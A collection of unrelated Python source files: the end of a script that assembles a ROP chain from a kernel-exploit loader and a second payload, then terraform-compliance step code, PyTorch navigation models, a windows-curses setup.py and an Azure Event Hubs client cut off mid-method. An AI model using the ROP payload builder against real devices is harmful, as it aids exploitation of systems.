with open(argv[1], "rb") as fin:
kx_loader = fin.read()
with open(argv[2], "rb") as fin:
second_payload = fin.read()
rop = make_rop(kx_loader, second_payload)
# We're initialized to zero, no need to keep trailing relocs that are 0
relocs = rop.compiled_relocs[:]
while relocs[-1] == 0:
del relocs[-1]
with open(argv[3], "wb") as fout:
for word in rop.compiled_rop:
fout.write(p32(word))
for reloc in relocs:
fout.write(p8(reloc))
# Print number of words to stdout
print(len(rop.compiled_rop))
return 0
if __name__ == "__main__":
exit(main())
|
<reponame>jrsherry/terraform-compliance<filename>terraform_compliance/steps/given/i_have_name_section_configured.py
# -*- coding: utf-8 -*-
from radish import world
from terraform_compliance.common.bdd_tags import look_for_bdd_tags
from terraform_compliance.common.helper import (
get_resource_address_list_from_stash,
find_root_by_key,
remove_mounted_resources,
transform_asg_style_tags,
convert_resource_type,
recursive_jsonify
)
from terraform_compliance.extensions.ext_radish_bdd import skip_step
import re
def i_have_name_section_configured(_step_obj, name, type_name='resource', _terraform_config=world):
'''
Finds given resource or variable by name and returns it. Skips the step (and further steps) if it is not found.
:param _step_obj: Internal, step object for radish.
:param name: String of the name of the resource_type or variable.
:param type_name: String of the type, either resource(s) or variable(s)
:param _terraform_config: Internal, terraform configuration.
:return:
'''
assert (type_name in ['resource', 'resources',
'variable', 'variables',
'output', 'outputs',
'provider', 'providers',
'data', 'datas']), \
'{} configuration type does not exist or not implemented yet. ' \
'Use resource(s), provider(s), variable(s), output(s) or data(s) instead.'.format(type_name)
if type_name.endswith('s'):
type_name = type_name[:-1]
# Process the tags
_step_obj = look_for_bdd_tags(_step_obj)
match = _step_obj.context.match
if not hasattr(_step_obj.context, 'cumulative_stash'):
_step_obj.context.cumulative_stash = []
if name in ('a resource', 'any resource', 'resources'):
_step_obj.context.type = type_name
_step_obj.context.name = name
_step_obj.context.stash = recursive_jsonify([obj for key, obj in _terraform_config.config.terraform.resources_raw.items()])
_step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
_step_obj.context.addresses = get_resource_address_list_from_stash(_step_obj.context.stash)
_step_obj.context.property_name = type_name
return True
elif name in ('an output', 'any output', 'outputs'):
_step_obj.context.type = 'output'
_step_obj.context.name = name
_step_obj.context.stash = recursive_jsonify([obj for key, obj in _terraform_config.config.terraform.configuration['outputs'].items()])
_step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
_step_obj.context.addresses = get_resource_address_list_from_stash(_terraform_config.config.terraform.configuration['outputs'])
_step_obj.context.property_name = 'output'
return True
elif name in ('a variable', 'any variable', 'variables'):
_step_obj.context.type = 'variable'
_step_obj.context.name = name
_step_obj.context.stash = recursive_jsonify([obj for key, obj in _terraform_config.config.terraform.configuration['variables'].items()])
_step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
_step_obj.context.addresses = 'variable'
_step_obj.context.property_name = 'variable'
return True
elif name.startswith('resource that supports'):
filter_property = re.match(r'resource that supports (.*)', name).group(1)
resource_types_supports_tags = find_root_by_key(_terraform_config.config.terraform.resources_raw,
filter_property,
return_key='type')
resource_list = []
for resource_type in resource_types_supports_tags:
# Issue-168: Mounted resources causes problem on recursive searching for resources that supports tags
# We are removing all mounted resources here for future steps, since we don't need them for
# tags checking.
found_resources = remove_mounted_resources(_terraform_config.config.terraform.find_resources_by_type(resource_type, match))
found_resources = transform_asg_style_tags(found_resources)
resource_list.extend(found_resources)
if resource_list:
_step_obj.context.type = type_name
_step_obj.context.name = name
_step_obj.context.stash = recursive_jsonify(resource_list)
_step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
_step_obj.context.addresses = get_resource_address_list_from_stash(resource_list)
_step_obj.context.property_name = type_name
return True
elif type_name == 'resource':
name = convert_resource_type(name)
resource_list = _terraform_config.config.terraform.find_resources_by_type(name, match)
if resource_list:
_step_obj.context.type = type_name
_step_obj.context.name = name
_step_obj.context.stash = recursive_jsonify(resource_list)
_step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
_step_obj.context.addresses = get_resource_address_list_from_stash(resource_list)
_step_obj.context.property_name = type_name
return True
elif type_name == 'variable':
found_variable = match.get(_terraform_config.config.terraform.variables, name, None)
if found_variable:
_step_obj.context.type = type_name
_step_obj.context.name = name
_step_obj.context.stash = [recursive_jsonify(found_variable)]
_step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
_step_obj.context.addresses = name
_step_obj.context.property_name = type_name
return True
elif type_name == 'output':
found_output = match.get(_terraform_config.config.terraform.outputs, name, None)
if found_output:
_step_obj.context.type = type_name
_step_obj.context.name = name
_step_obj.context.stash = recursive_jsonify(found_output)
_step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
_step_obj.context.addresses = name
_step_obj.context.property_name = type_name
return True
elif type_name == 'provider':
found_provider = _terraform_config.config.terraform.get_providers_from_configuration(name, match)
if found_provider:
_step_obj.context.type = type_name
_step_obj.context.name = name
_step_obj.context.stash = recursive_jsonify(found_provider)
_step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
_step_obj.context.addresses = name
_step_obj.context.address = name
_step_obj.context.property_name = type_name
return True
elif type_name == 'data':
name = convert_resource_type(name)
data_list = _terraform_config.config.terraform.find_data_by_type(name, match)
if data_list:
_step_obj.context.type = type_name
_step_obj.context.name = name
_step_obj.context.stash = recursive_jsonify(data_list)
_step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
_step_obj.context.addresses = name
_step_obj.context.address = name
_step_obj.context.property_name = type_name
return True
skip_step(_step_obj, name)
|
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from param import args
class ObjEncoder(nn.Module):
''' Encodes object labels using GloVe. '''
def __init__(self, vocab_size, embedding_size, glove_matrix):
super(ObjEncoder, self).__init__()
padding_idx = 100
self.embedding = nn.Embedding(vocab_size, embedding_size, padding_idx)
self.embedding.weight.data[...] = torch.from_numpy(glove_matrix)
self.embedding.weight.requires_grad = False
def forward(self, inputs):
embeds = self.embedding(inputs)
return embeds
class EncoderLSTM(nn.Module):
''' Encodes navigation instructions, returning hidden state context (for
attention methods) and a decoder initial state. '''
def __init__(self, vocab_size, embedding_size, hidden_size, padding_idx,
dropout_ratio, bidirectional=False, num_layers=1, glove=None):
super(EncoderLSTM, self).__init__()
self.embedding_size = embedding_size
self.hidden_size = hidden_size
self.drop = nn.Dropout(p=dropout_ratio)
if bidirectional:
print("Using Bidir in EncoderLSTM")
self.num_directions = 2 if bidirectional else 1
self.num_layers = num_layers
self.embedding = nn.Embedding(vocab_size, embedding_size, padding_idx)
if glove is not None:
print('Using glove word embedding')
self.embedding.weight.data[...] = torch.from_numpy(glove)
self.embedding.weight.requires_grad = False
input_size = embedding_size
self.lstm = nn.LSTM(input_size, hidden_size, self.num_layers,
batch_first=True, dropout=dropout_ratio,
bidirectional=bidirectional)
self.encoder2decoder = nn.Linear(hidden_size * self.num_directions,
hidden_size * self.num_directions
)
def init_state(self, inputs):
''' Initialize to zero cell states and hidden states.'''
batch_size = inputs.size(0)
h0 = Variable(torch.zeros(
self.num_layers * self.num_directions,
batch_size,
self.hidden_size
), requires_grad=False)
c0 = Variable(torch.zeros(
self.num_layers * self.num_directions,
batch_size,
self.hidden_size
), requires_grad=False)
return h0.cuda(), c0.cuda()
def forward(self, inputs, lengths):
''' Expects input vocab indices as (batch, seq_len). Also requires a
list of lengths for dynamic batching. '''
embeds = self.embedding(inputs) # (batch, seq_len, embedding_size)
embeds = self.drop(embeds)
h0, c0 = self.init_state(inputs)
packed_embeds = pack_padded_sequence(embeds, lengths, batch_first=True)
enc_h, (enc_h_t, enc_c_t) = self.lstm(packed_embeds, (h0, c0))
if self.num_directions == 2: # The size of enc_h_t is (num_layers * num_directions, batch, hidden_size)
h_t = torch.cat((enc_h_t[-1], enc_h_t[-2]), 1)
c_t = torch.cat((enc_c_t[-1], enc_c_t[-2]), 1)
else:
h_t = enc_h_t[-1]
c_t = enc_c_t[-1] # (batch, hidden_size)
ctx, _ = pad_packed_sequence(enc_h, batch_first=True)
if args.sub_out == "max":
ctx_max, _ = ctx.max(1)
decoder_init = nn.Tanh()(self.encoder2decoder(ctx_max))
elif args.sub_out == "tanh":
decoder_init = nn.Tanh()(self.encoder2decoder(h_t))
else:
assert False
ctx = self.drop(ctx)
if args.zero_init:
return ctx, torch.zeros_like(decoder_init), torch.zeros_like(c_t)
else:
return ctx, decoder_init, c_t # (batch, seq_len, hidden_size*num_directions)
# (batch, hidden_size)
class SoftDotAttention(nn.Module):
'''Soft Dot Attention.
Ref: http://www.aclweb.org/anthology/D15-1166
Adapted from PyTorch OPEN NMT.
'''
def __init__(self, query_dim, ctx_dim):
'''Initialize layer.'''
super(SoftDotAttention, self).__init__()
self.linear_in = nn.Linear(query_dim, ctx_dim, bias=False)
self.sm = nn.Softmax()
self.linear_out = nn.Linear(query_dim + ctx_dim, query_dim, bias=False)
self.tanh = nn.Tanh()
def forward(self, h, context, mask=None,
output_tilde=True, output_prob=True):
'''Propagate h through the network.
h: batch x dim
context: batch x seq_len x dim
mask: batch x seq_len indices to be masked
'''
target = self.linear_in(h).unsqueeze(2) # batch x dim x 1
# Get attention
attn = torch.bmm(context, target).squeeze(2) # batch x seq_len
logit = attn
if mask is not None:
# -Inf masking prior to the softmax
attn.masked_fill_(mask, -float('inf'))
attn = self.sm(attn) # There will be a bug here, but it's actually a problem in torch source code.
attn3 = attn.view(attn.size(0), 1, attn.size(1)) # batch x 1 x seq_len
weighted_context = torch.bmm(attn3, context).squeeze(1) # batch x dim
if not output_prob:
attn = logit
if output_tilde:
h_tilde = torch.cat((weighted_context, h), 1)
h_tilde = self.tanh(self.linear_out(h_tilde))
return h_tilde, weighted_context, attn
else:
return weighted_context, attn
class ScaledSoftDotAttention(nn.Module):
def __init__(self, q_dim, k_dim, v_dim, output_dim):
super(ScaledSoftDotAttention, self).__init__()
self.scale = 1 / (output_dim**0.5)
self.linear_q = nn.Linear(q_dim, output_dim, bias=False)
self.linear_k = nn.Linear(k_dim, output_dim, bias=False)
self.linear_v = nn.Sequential(nn.Linear(v_dim, output_dim), nn.Tanh())
def forward(self, q_in, k_in, v_in, mask=None):
'''
q = B x L x D
k = B x L x N x D
v = B x L x N x D
mask = B x L x N
'''
q = self.linear_q(q_in)
k = self.linear_k(k_in)
v = self.linear_v(v_in)
attn = torch.matmul(k, q.unsqueeze(3)).squeeze(3) * self.scale
if mask is not None:
attn.masked_fill_(mask, -1e9)
attn = F.softmax(attn, dim=-1)
v_out = torch.matmul(v.permute(0,1,3,2), attn.unsqueeze(3)).squeeze(3)
return v_out
class ASODecoderLSTM(nn.Module):
def __init__(self, action_embed_size, hidden_size, dropout_ratio):
super(ASODecoderLSTM, self).__init__()
self.action_embed_size = action_embed_size
self.hidden_size = hidden_size
self.action_embedding = nn.Sequential(nn.Linear(args.angle_feat_size, action_embed_size), nn.Tanh())
self.drop = nn.Dropout(p=dropout_ratio)
self.drop_env = nn.Dropout(p=args.featdropout)
self.feat_att_layer = SoftDotAttention(hidden_size, args.visual_feat_size+args.angle_feat_size)
self.lstm = nn.LSTMCell(action_embed_size+args.visual_feat_size+args.angle_feat_size, hidden_size)
self.action_att_layer = SoftDotAttention(hidden_size, hidden_size)
self.subject_att_layer = SoftDotAttention(hidden_size, hidden_size)
self.object_att_layer = SoftDotAttention(hidden_size, hidden_size)
self.fuse_a = nn.Linear(hidden_size, 1)
self.fuse_s = nn.Linear(hidden_size, 1)
self.fuse_o = nn.Linear(hidden_size, 1)
self.value_action = nn.Sequential(nn.Linear(args.angle_feat_size, hidden_size), nn.Tanh())
self.subject_att = ScaledSoftDotAttention(args.angle_feat_size, args.angle_feat_size, args.visual_feat_size, hidden_size)
self.object_att = ScaledSoftDotAttention(hidden_size, args.glove_dim+args.angle_feat_size, args.glove_dim+args.angle_feat_size, hidden_size)
#cand attention layer
self.cand_att_a = SoftDotAttention(hidden_size, hidden_size)
self.cand_att_s = SoftDotAttention(hidden_size, hidden_size)
self.cand_att_o = SoftDotAttention(hidden_size, hidden_size)
def forward(self, action, feature,
cand_visual_feat, cand_angle_feat, cand_obj_feat,
near_visual_mask, near_visual_feat, near_angle_feat,
near_obj_mask, near_obj_feat, near_edge_feat,
h_0, prev_h1, c_0,
ctx, ctx_mask=None,
already_dropfeat=False):
action_embeds = self.action_embedding(action)
action_embeds = self.drop(action_embeds)
if not already_dropfeat:
feature[..., :-args.angle_feat_size] = self.drop_env(feature[..., :-args.angle_feat_size])
cand_visual_feat = self.drop_env(cand_visual_feat)
near_visual_feat = self.drop_env(near_visual_feat)
cand_obj_feat = self.drop_env(cand_obj_feat)
near_obj_feat = self.drop_env(near_obj_feat)
prev_h1_drop = self.drop(prev_h1)
attn_feat, _ = self.feat_att_layer(prev_h1_drop, feature, output_tilde=False)
concat_input = torch.cat((action_embeds, attn_feat), dim=-1)
h_1, c_1 = self.lstm(concat_input, (prev_h1, c_0))
h_1_drop = self.drop(h_1)
h_a, u_a, _ = self.action_att_layer(h_1_drop, ctx, ctx_mask)
h_s, u_s, _ = self.subject_att_layer(h_1_drop, ctx, ctx_mask)
h_o, u_o, _ = self.object_att_layer(h_1_drop, ctx, ctx_mask)
h_a_drop, u_a_drop = self.drop(h_a), self.drop(u_a)
h_s_drop, u_s_drop = self.drop(h_s), self.drop(u_s)
h_o_drop, u_o_drop = self.drop(h_o), self.drop(u_o)
fusion_weight = torch.cat([self.fuse_a(u_a_drop), self.fuse_s(u_s_drop), self.fuse_o(u_o_drop)], dim=-1)
fusion_weight = F.softmax(fusion_weight, dim=-1)
B, L = near_visual_mask.shape[0], near_visual_mask.shape[1]
#action
v_action = self.value_action(cand_angle_feat)
#subject
v_subject = self.subject_att(cand_angle_feat, near_angle_feat, near_visual_feat, near_visual_mask)
v_subject = self.drop(v_subject)
#object
near_obj = torch.cat([near_obj_feat, near_edge_feat.unsqueeze(3).expand(-1,-1,-1,args.top_N_obj,-1)], dim=-1)
near_obj = near_obj.view(B, L, 4*args.top_N_obj, -1)
near_obj_mask = near_obj_mask.unsqueeze(3).expand(-1,-1,-1,args.top_N_obj).contiguous().view(B, L, 4*args.top_N_obj)
v_object = self.object_att(u_o_drop.unsqueeze(1).expand(-1,L,-1), near_obj, near_obj, near_obj_mask)
v_object = self.drop(v_object)
_, logit_a = self.cand_att_a(h_a_drop, v_action, output_tilde=False, output_prob=False)
_, logit_s = self.cand_att_s(h_s_drop, v_subject, output_tilde=False, output_prob=False)
_, logit_o = self.cand_att_o(h_o_drop, v_object, output_tilde=False, output_prob=False)
logit = torch.cat([logit_a.unsqueeze(2), logit_s.unsqueeze(2), logit_o.unsqueeze(2)], dim=-1)
logit = torch.matmul(logit, fusion_weight.unsqueeze(2)).squeeze(2)
h_tilde = (h_a + h_s + h_o) / 3.
return h_1, c_1, logit, h_tilde
class Critic(nn.Module):
def __init__(self):
super(Critic, self).__init__()
self.state2value = nn.Sequential(
nn.Linear(args.rnn_dim, args.rnn_dim),
nn.ReLU(),
nn.Dropout(args.dropout),
nn.Linear(args.rnn_dim, 1),
)
def forward(self, state):
return self.state2value(state).squeeze()
class SpeakerEncoder(nn.Module):
def __init__(self, feature_size, hidden_size, dropout_ratio, bidirectional):
super().__init__()
self.num_directions = 2 if bidirectional else 1
self.hidden_size = hidden_size
self.num_layers = 1
self.feature_size = feature_size
if bidirectional:
print("BIDIR in speaker encoder!!")
self.lstm = nn.LSTM(feature_size, self.hidden_size // self.num_directions, self.num_layers,
batch_first=True, dropout=dropout_ratio, bidirectional=bidirectional)
self.drop = nn.Dropout(p=dropout_ratio)
self.drop3 = nn.Dropout(p=args.featdropout)
self.attention_layer = SoftDotAttention(self.hidden_size, feature_size)
self.post_lstm = nn.LSTM(self.hidden_size, self.hidden_size // self.num_directions, self.num_layers,
batch_first=True, dropout=dropout_ratio, bidirectional=bidirectional)
def forward(self, action_embeds, feature, lengths, already_dropfeat=False):
"""
:param action_embeds: (batch_size, length, 2048 + 128). The feature of the view
:param feature: (batch_size, length, 36, 2048 + 128). The action taken (with the image feature)
:param lengths: Not used in it
:return: context with shape (batch_size, length, hidden_size)
"""
x = action_embeds
if not already_dropfeat:
x[..., :-args.angle_feat_size] = self.drop3(x[..., :-args.angle_feat_size]) # Do not dropout the spatial features
# LSTM on the action embed
ctx, _ = self.lstm(x)
ctx = self.drop(ctx)
# Att and Handle with the shape
batch_size, max_length, _ = ctx.size()
if not already_dropfeat:
feature[..., :-args.angle_feat_size] = self.drop3(feature[..., :-args.angle_feat_size]) # Dropout the image feature
x, _, _ = self.attention_layer( # Attend to the feature map
ctx.contiguous().view(-1, self.hidden_size), # (batch, length, hidden) --> (batch x length, hidden)
feature.view(batch_size * max_length, -1, self.feature_size), # (batch, length, # of images, feature_size) --> (batch x length, # of images, feature_size)
)
x = x.view(batch_size, max_length, -1)
x = self.drop(x)
# Post LSTM layer
x, _ = self.post_lstm(x)
x = self.drop(x)
return x
class SpeakerDecoder(nn.Module):
def __init__(self, vocab_size, embedding_size, padding_idx, hidden_size, dropout_ratio):
super().__init__()
self.hidden_size = hidden_size
self.embedding = torch.nn.Embedding(vocab_size, embedding_size, padding_idx)
self.lstm = nn.LSTM(embedding_size, hidden_size, batch_first=True)
self.drop = nn.Dropout(dropout_ratio)
self.attention_layer = SoftDotAttention(hidden_size, hidden_size)
self.projection = nn.Linear(hidden_size, vocab_size)
self.baseline_projection = nn.Sequential(
nn.Linear(hidden_size, 128),
nn.ReLU(),
nn.Dropout(dropout_ratio),
nn.Linear(128, 1)
)
def forward(self, words, ctx, ctx_mask, h0, c0):
embeds = self.embedding(words)
embeds = self.drop(embeds)
x, (h1, c1) = self.lstm(embeds, (h0, c0))
x = self.drop(x)
# Get the size
batchXlength = words.size(0) * words.size(1)
multiplier = batchXlength // ctx.size(0) # By using this, it also supports the beam-search
# Att and Handle with the shape
# Reshaping x <the output> --> (b(word)*l(word), r)
# Expand the ctx from (b, a, r) --> (b(word)*l(word), a, r)
# Expand the ctx_mask (b, a) --> (b(word)*l(word), a)
x, _, _ = self.attention_layer(
x.contiguous().view(batchXlength, self.hidden_size),
ctx.unsqueeze(1).expand(-1, multiplier, -1, -1).contiguous(). view(batchXlength, -1, self.hidden_size),
mask=ctx_mask.unsqueeze(1).expand(-1, multiplier, -1).contiguous().view(batchXlength, -1)
)
x = x.view(words.size(0), words.size(1), self.hidden_size)
# Output the prediction logit
x = self.drop(x)
logit = self.projection(x)
return logit, h1, c1 |
import sys
from setuptools import setup, Extension
libraries = ['pdcurses', 'user32', 'advapi32', 'gdi32', 'comdlg32', 'shell32']
define_macros = [
('PDC_WIDE', None),
('HAVE_NCURSESW', None),
('HAVE_TERM_H', None),
('HAVE_CURSES_IS_TERM_RESIZED', None),
('HAVE_CURSES_RESIZE_TERM', None),
('HAVE_CURSES_TYPEAHEAD', None),
('HAVE_CURSES_HAS_KEY', None),
('HAVE_CURSES_FILTER', None),
('HAVE_CURSES_WCHGAT', None),
('HAVE_CURSES_USE_ENV', None),
('HAVE_CURSES_IMMEDOK', None),
('HAVE_CURSES_SYNCOK', None),
# ('HAVE_CURSES_IS_PAD', None),
('WINDOW_HAS_FLAGS', None),
('NCURSES_MOUSE_VERSION', 2),
('_ISPAD', 0x10),
('is_term_resized', 'is_termresized'),
]
srcdir = 'py%i%i//' % sys.version_info[:2]
include_dirs = ["PDCurses", "."]
library_dirs = ["PDCurses/wincon"]
LONG_DESCRIPTION = """
Adds support for the standard Python curses module on Windows. Based on
https://www.lfd.uci.edu/~gohlke/pythonlibs/#curses. Uses the PDCurses
curses implementation.
PDCurses is compiled with wide character support, meaning get_wch() is
available. UTF-8 is forced as the encoding.
Note that PDCurses requires an explicit curses.resize_term(0, 0) call after
receiving KEY_RESIZE to get behavior similar to the automatic SIGWINCH handling
in ncurses. ncurses reliably fails for resize_term(0, 0), so a compatibility
hack is to always call resize_term(0, 0) and ignore any curses.error
exceptions.
Maybe it would be better to detect KEY_RESIZE in _cursesmodule.c and call
resize_term(0, 0) there, for automatic compatibility...
"""[1:-1]
setup(
name='windows-curses',
version='1.1',
description="Support for the standard curses module on Windows",
long_description=LONG_DESCRIPTION,
url='http://bugs.python.org/issue2889',
license='PSF2',
ext_modules=[
Extension('_curses',
# term.h and terminfo.c was removed from PDCurses in commit
# 6b569295 ("Eliminated term.h, terminfo.c; moved mvcur() to
# move.c"). They provide functions that are called
# unconditionally by _cursesmodule.c, so we keep a copy of
# the last versions in this repo.
#
# See https://github.com/wmcbrine/PDCurses/issue/55.
sources=[srcdir + '_cursesmodule.c', 'terminfo.c'],
define_macros=define_macros,
include_dirs=include_dirs,
library_dirs=library_dirs,
libraries=libraries),
Extension('_curses_panel',
sources=[srcdir + '_curses_panel.c'],
define_macros=define_macros,
include_dirs=include_dirs,
library_dirs=library_dirs,
libraries=libraries)
],
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Console :: Curses',
'Environment :: Win32 (MS Windows)',
'License :: OSI Approved :: Python Software Foundation License',
'Operating System :: Microsoft :: Windows',
'Programming Language :: C',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
|
<reponame>piyawath/azure-sdk-for-python<filename>sdk/eventhub/azure-eventhubs/azure/eventhub/_consumer_client.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import logging
from typing import Any, Union, Dict, Tuple, TYPE_CHECKING, Callable, List
from .common import EventHubSharedKeyCredential, EventHubSASTokenCredential, EventData
from .client import EventHubClient
from ._eventprocessor.event_processor import EventProcessor
from ._eventprocessor.partition_context import PartitionContext
if TYPE_CHECKING:
from azure.core.credentials import TokenCredential # type: ignore
log = logging.getLogger(__name__)
class EventHubConsumerClient(EventHubClient):
""" The EventHubProducerClient class defines a high level interface for
receiving events from the Azure Event Hubs service.
The main goal of `EventHubConsumerClient` is to receive events from all partitions of an EventHub with
load balancing and checkpointing.
When multiple `EventHubConsumerClient` works with one process, multiple processes, or multiple computer machines
and if they use the same repository as the load balancing and checkpointing store, they will balance automatically.
To enable the load balancing and / or checkpointing, partition_manager must be set when creating the
`EventHubConsumerClient`.
An `EventHubConsumerClient` can also receive from a specific partition when you call its method `receive()`
and specify the partition_id.
Load balancing won't work in single-partition mode. But users can still save checkpoint if the partition_manager
is set.
:param str host: The hostname of the Event Hub.
:param str event_hub_path: The path of the specific Event Hub to connect the client to.
:param credential: The credential object used for authentication which implements particular interface
of getting tokens. It accepts :class:`EventHubSharedKeyCredential<azure.eventhub.EventHubSharedKeyCredential>`,
:class:`EventHubSASTokenCredential<azure.eventhub.EventHubSASTokenCredential>`, or credential objects generated by
the azure-identity library and objects that implement `get_token(self, *scopes)` method.
:keyword bool logging_enable: Whether to output network trace logs to the logger. Default is `False`.
:keyword float auth_timeout: The time in seconds to wait for a token to be authorized by the service.
The default value is 60 seconds. If set to 0, no timeout will be enforced from the client.
:keyword str user_agent: The user agent that needs to be appended to the built in user agent string.
:keyword int retry_total: The total number of attempts to redo the failed operation when an error happened. Default
value is 3.
:keyword transport_type: The type of transport protocol that will be used for communicating with
the Event Hubs service. Default is `TransportType.Amqp`.
:paramtype transport_type: ~azure.eventhub.TransportType
:keyword dict http_proxy: HTTP proxy settings. This must be a dictionary with the following
keys: 'proxy_hostname' (str value) and 'proxy_port' (int value).
Additionally the following keys may also be present: 'username', 'password'.
:keyword partition_manager: stores the load balancing data and checkpoint data when receiving events
if partition_manager is specified. If it's None, this `EventHubConsumerClient` instance will receive
events without load balancing and checkpoint.
:paramtype partition_manager: ~azure.eventhub.PartitionManager
:keyword float load_balancing_interval: When load balancing kicks in, this is the interval in seconds
between two load balancing. Default is 10.
.. admonition:: Example:
.. literalinclude:: ../samples/sync_samples/sample_code_eventhub.py
:start-after: [START create_eventhub_consumer_client_sync]
:end-before: [END create_eventhub_consumer_client_sync]
:language: python
:dedent: 4
:caption: Create a new instance of the EventHubConsumerClient.
"""
def __init__(self, host, event_hub_path, credential, **kwargs):
# type:(str, str, Union[EventHubSharedKeyCredential, EventHubSASTokenCredential, TokenCredential], Any) -> None
""""""
receive_timeout = kwargs.get("receive_timeout", 3)
if receive_timeout <= 0:
raise ValueError("receive_timeout must be greater than 0.")
kwargs['receive_timeout'] = receive_timeout
self._partition_manager = kwargs.pop("partition_manager", None)
self._load_balancing_interval = kwargs.pop("load_balancing_interval", 10)
super(EventHubConsumerClient, self).__init__(
host=host, event_hub_path=event_hub_path, credential=credential,
network_tracing=kwargs.get("logging_enable"), **kwargs)
self._event_processors = dict() # type: Dict[Tuple[str, str], EventProcessor]
self._closed = False
@classmethod
def _stop_eventprocessor(cls, event_processor):
# pylint: disable=protected-access
eventhub_client = event_processor._eventhub_client
consumer_group = event_processor._consumer_group_name
partition_id = event_processor._partition_id
with eventhub_client._lock:
event_processor.stop()
if partition_id and (consumer_group, partition_id) in eventhub_client._event_processors:
del eventhub_client._event_processors[(consumer_group, partition_id)]
elif (consumer_group, '-1') in eventhub_client._event_processors:
del eventhub_client._event_processors[(consumer_group, "-1")]
@classmethod
def from_connection_string(cls, conn_str, **kwargs):
# type: (str, Any) -> EventHubConsumerClient
"""
Create an EventHubConsumerClient from a connection string.
:param str conn_str: The connection string of an eventhub.
:keyword str event_hub_path: The path of the specific Event Hub to connect the client to.
:keyword bool network_tracing: Whether to output network trace logs to the logger. Default is `False`.
:keyword dict[str,Any] http_proxy: HTTP proxy settings. This must be a dictionary with the following
keys - 'proxy_hostname' (str value) and 'proxy_port' (int value).
Additionally the following keys may also be present - 'username', 'password'.
:keyword float auth_timeout: The time in seconds to wait for a token to be authorized by the service.
The default value is 60 seconds. If set to 0, no timeout will be enforced from the client.
:keyword str user_agent: The user agent that needs to be appended to the built in user agent string.
:keyword int retry_total: The total number of attempts to redo the failed operation when an error happened.
Default value is 3.
:keyword transport_type: The type of transport protocol that will be used for communicating with
the Event Hubs service. Default is `TransportType.Amqp`.
:paramtype transport_type: ~azure.eventhub.TransportType
:keyword partition_manager:
stores the load balancing data and checkpoint data when receiving events
if partition_manager is specified. If it's None, this EventHubConsumerClient instance will receive
events without load balancing and checkpoint.
:paramtype partition_manager: ~azure.eventhub.PartitionManager
:keyword float load_balancing_interval:
When load balancing kicks in, this is the interval in seconds between two load balancing. Default is 10.
.. admonition:: Example:
.. literalinclude:: ../samples/sync_samples/sample_code_eventhub.py
:start-after: [START create_eventhub_consumer_client_from_conn_str_sync]
:end-before: [END create_eventhub_consumer_client_from_conn_str_sync]
:language: python
:dedent: 4
:caption: Create a new instance of the EventHubConsumerClient from connection string.
"""
return super(EventHubConsumerClient, cls).from_connection_string(conn_str, **kwargs)
def receive(self, on_events, consumer_group, **kwargs):
# type: (Callable[[PartitionContext, List[EventData]], None], str, Any) -> None
"""Receive events from partition(s) optionally with load balancing and checkpointing.
:param on_events: The callback function for handling received events. The callback takes two
parameters: `partition_context` which contains partition context and `events` which are the received events.
Please define the callback like `on_event(partition_context, events)`.
For detailed partition context information, please refer to
:class:`PartitionContext<azure.eventhub.PartitionContext>`.
:type on_events: Callable[~azure.eventhub.PartitionContext, List[EventData]]
:param consumer_group: Receive events from the event hub for this consumer group
:type consumer_group: str
:keyword str partition_id: Receive from this partition only if it's not None.
Receive from all partition otherwise.
:keyword int owner_level: The priority of the exclusive consumer. An exclusive
consumer will be created if owner_level is set. Higher owner_level has higher exclusive priority.
:keyword int prefetch: The number of events to prefetch from the service
for processing. Default is 300.
:keyword bool track_last_enqueued_event_properties: Indicates whether the consumer should request information
on the last enqueued event on its associated partition, and track that information as events are received.
When information about the partition's last enqueued event is being tracked, each event received from the
Event Hubs service will carry metadata about the partition. This results in a small amount of additional
network bandwidth consumption that is generally a favorable trade-off when considered against periodically
making requests for partition properties using the Event Hub client.
It is set to `False` by default.
:keyword initial_event_position: Start receiving from this initial_event_position
if there isn't checkpoint data for a partition. Use the checkpoint data if there it's available. This can be a
a dict with partition id as the key and position as the value for individual partitions, or a single
EventPosition instance for all partitions.
:paramtype initial_event_position: ~azure.eventhub.EventPosition or dict[str,~azure.eventhub.EventPosition]
:keyword on_error: The callback function which would be called when there is an error met during the receiving
time. The callback takes two parameters: `partition_context` which contains partition information
and `error` being the exception. Please define the callback like `on_error(partition_context, error)`.
:paramtype on_error: Callable[[~azure.eventhub.PartitionContext, Exception]]
:keyword on_partition_initialize: The callback function which will be called after a consumer for certain
partition finishes initialization. The callback takes two parameter: `partition_context` which contains
the partition information. Please define the callback like `on_partition_initialize(partition_context)`.
:paramtype on_partition_initialize: Callable[[~azure.eventhub.PartitionContext]]
:keyword on_partition_close: The callback function which will be called after a consumer for certain
partition is closed. The callback takes two parameters: `partition_context` which contains partition
information and `reason` for the close. Please define the callback like
`on_partition_close(partition_context, reason)`.
Please refer to :class:`CloseReason<azure.eventhub.CloseReason>` for different closing reason.
:paramtype on_partition_close: Callable[[~azure.eventhub.PartitionContext, CloseReason]]
:rtype: None
.. admonition:: Example:
.. literalinclude:: ../samples/sync_samples/sample_code_eventhub.py
:start-after: [START eventhub_consumer_client_receive_sync]
:end-before: [END eventhub_consumer_client_receive_sync]
:language: python
:dedent: 4
:caption: Receive events from the EventHub.
"""
partition_id = kwargs.get("partition_id")
with self._lock:
error = None
if (consumer_group, '-1') in self._event_processors:
error = ValueError("This consumer client is already receiving events from all partitions for"
" consumer group {}. ".format(consumer_group))
elif partition_id is None and any(x[0] == consumer_group for x in self._event_processors):
